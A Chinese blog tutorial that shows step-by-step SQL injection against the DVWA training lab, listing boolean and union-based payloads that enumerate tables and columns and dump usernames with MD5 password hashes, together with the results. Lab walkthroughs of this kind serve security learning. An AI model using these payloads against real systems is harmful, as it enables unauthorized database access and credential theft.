简单的SQL注入 -- dvwa

最新推荐文章于 2024-05-16 15:44:40 发布
最新推荐文章于 2024-05-16 15:44:40 发布
阅读量487 收藏 1
点赞数
分类专栏: 信息安全 文章标签: mysql 数据库 sql注入 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kylinholmes/article/details/115087896
版权

简单的SQL注入 – dvwa

dvwalow-level为例

布尔注入

Injection Code

' or 1 = 1 #

Result

这里可以查出其他用户的一些信息

ID: ' or 1 =1 # 
First name: admin
Surname: admin
ID: ' or 1 =1 # 
First name: Gordon
Surname: Brown
ID: ' or 1 =1 # 
First name: Hack
Surname: Me
ID: ' or 1 =1 # 
First name: Pablo
Surname: Picasso
ID: ' or 1 =1 # 
First name: Bob
Surname: Smith

联合注入

如果我们需要更多信息,可以考虑联合注入,主要是以下几步

  1. 确定字段数
  2. 找到数据库名称
  3. 找到数据库内的表名
  4. 找到表的字段
  5. 找到敏感信息

1.确定字段数

Injection Code
' union select 1 # 

' union select 1, 2 #

……

简单的可以通过报错信息来试出有多少个字段

Result (错误信息)
The used SELECT statements have a different number of columns
Result (正确信息)
ID: ' union select 1, 2 # 
First name: 1
Surname: 2

2. 找到数据库名称

Injection Code
 ' union select 1, database() #

因为有两个字段,所以要写个1来占位

Result
ID:  ' union select 1, database() # 
First name: 1
Surname: dvwa

这里可以看到我们的数据库名叫dvwa

3. 找到数据库内的表名

Injection Code
' union select 1, table_name from information_schema.tables where table_schema = 'dvwa' #

table_name记录了表的名字,table_schema记录的是数据库的名字,这些信息记录在information_schematables里面。

Result Code
ID: ' union select 1, table_name from information_schema.tables where table_schema = 'dvwa' #
First name: 1
Surname: guestbook
ID: ' union select 1, table_name from information_schema.tables where table_schema = 'dvwa' #
First name: 1
Surname: users

4. 找到表的字段

Injection Code
' union select 1, column_name from information_schema.columns  where table_name='users' #

column_name是表的字段名,table_name是表名

Result
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: user_id
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: first_name
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: last_name
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: user
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: password
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: avatar
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: last_login
ID: ' union select 1, column_name from information_schema.columns  where table_name='users' #
First name: 1
Surname: failed_login

这里简单整理一下,就可以获得这张表的字段如下:

user_idfirst_namelast_nameuserpasswordavatarlast_loginfailed_login

5. 找到敏感信息

Injection Code
 ' union select user_id, concat(user,'\t', password) from dvwa.users #

如果要查多个字段的话,可以用 concat函数,中间可以用"\t"连接

Result
ID: ' union select user_id, concat(user,'\t', password) from dvwa.users #
First name: 1
Surname: admin	5f4dcc3b5aa765d61d8327deb882cf99
ID: ' union select user_id, concat(user,'\t', password) from dvwa.users #
First name: 2
Surname: gordonb	e99a18c428cb38d5f260853678922e03
ID: ' union select user_id, concat(user,'\t', password) from dvwa.users #
First name: 3
Surname: 1337	8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select user_id, concat(user,'\t', password) from dvwa.users #
First name: 4
Surname: pablo	0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select user_id, concat(user,'\t', password) from dvwa.users #
First name: 5
Surname: smithy	5f4dcc3b5aa765d61d8327deb882cf99
user_iduserpassword(经过加密,不能看到明文)
1admin5f4dcc3b5aa765d61d8327deb882cf99
2gordonbe99a18c428cb38d5f260853678922e03
313378d3533d75ae2c3966d7e0d4fcc69216b
4pablo0d107d09f5bbe40cade3de5c71e9e9b7
5smithy5f4dcc3b5aa765d61d8327deb882cf99
kylinholmes
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
DVWA-master.zip
01-04
DVWA的"SQL注入"部分,你可以尝试通过构造恶意输入来操纵数据库查询,以获取敏感信息或执行非授权操作。这涵盖了盲注、时间基注入和错误回显等多种方法,有助于理解SQL注入的危害和防御手段。 3. **跨站脚本...
Web安全之SQL注入漏洞学习(七)-堆叠注入
u012002125的博客
10-10 886
堆叠注入简介 堆叠注入是指注入的多条SQL语句可以一起执行。MySQL命令行中, 每一条语句结尾加; 表示语句结束。这样是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理&局限性 原理 在MySQL的SQL语法中,分号;是用来表示一条sql语句的结束,使用分号结束后可以在写一条SQL语句,若将使用分号分割的两条语句一起发给后端则两条语句都会被执行。 局限 1、堆叠注入需要后端API是否支持多语句执行,数据库引擎是否支持的限制,如果有一个不支持则无法使用
DVWA通过攻略之SQL注入
勿山几已
05-24 8540
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968101的博客
05-16 637
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5977
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
slqmap的爆库爆表爆字段(以本地搭建的DVWA为例)
PromisingQ
07-09 1168
环境 window10、sqlmap、本地搭建的DVWA 步骤 1、先将DVWA安全等级设置为low 2、选择SQL Injection输入1查询 3、将url复制下来,并查看cookie信息 url:http://localhost:800/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# cookie="Cookie: security=low; PHPSESSID=7si7t5md1ntl03q0oc1ktcm0q2" 4、打开sqlmap使
DVWA-master.7z 压缩包
09-14
- SQL注入:通过构造特定的输入,攻击者可以执行恶意的SQL命令。 - 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击...
Metaspliot进行漏洞扫描
weixin_30895603的博客
01-23 1247
Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研究人员和黑客之间最受欢迎的渗透测试工具之一。除了渗透测试,该工具还能够在网络和Web应用程序中...
DVWA-SQL注入
acdcccc的博客
08-26 311
分享DVWA靶场的SQL注入过程
DVWA-------简单SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
dvwa——sql注入
GZY0601的博客
09-16 597
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3344
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5524
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA--sql注入(布尔盲注)
firecjh的博客
06-09 170
使用参数1' and 1=1 #进行提交,页面显示存在。使用参数1' and 1=2 #进行提交,页面显示不存在。判断出是基于字符型的布尔注入。1)、判断是否存在注入,注入是字符型还是数字型。7)猜解数据库表中的列的数量。8)猜解数据库表中列名称的长度。9)猜解数据库表中的列的名称。5)猜解数据库表名的长度。4)猜解数据库表的数量。6)猜解数据库表的名称。10)猜测用户名和密码。猜解数据库名的长度。
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2748
DVWA------SQL Injection (Blind)(SQL盲注)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值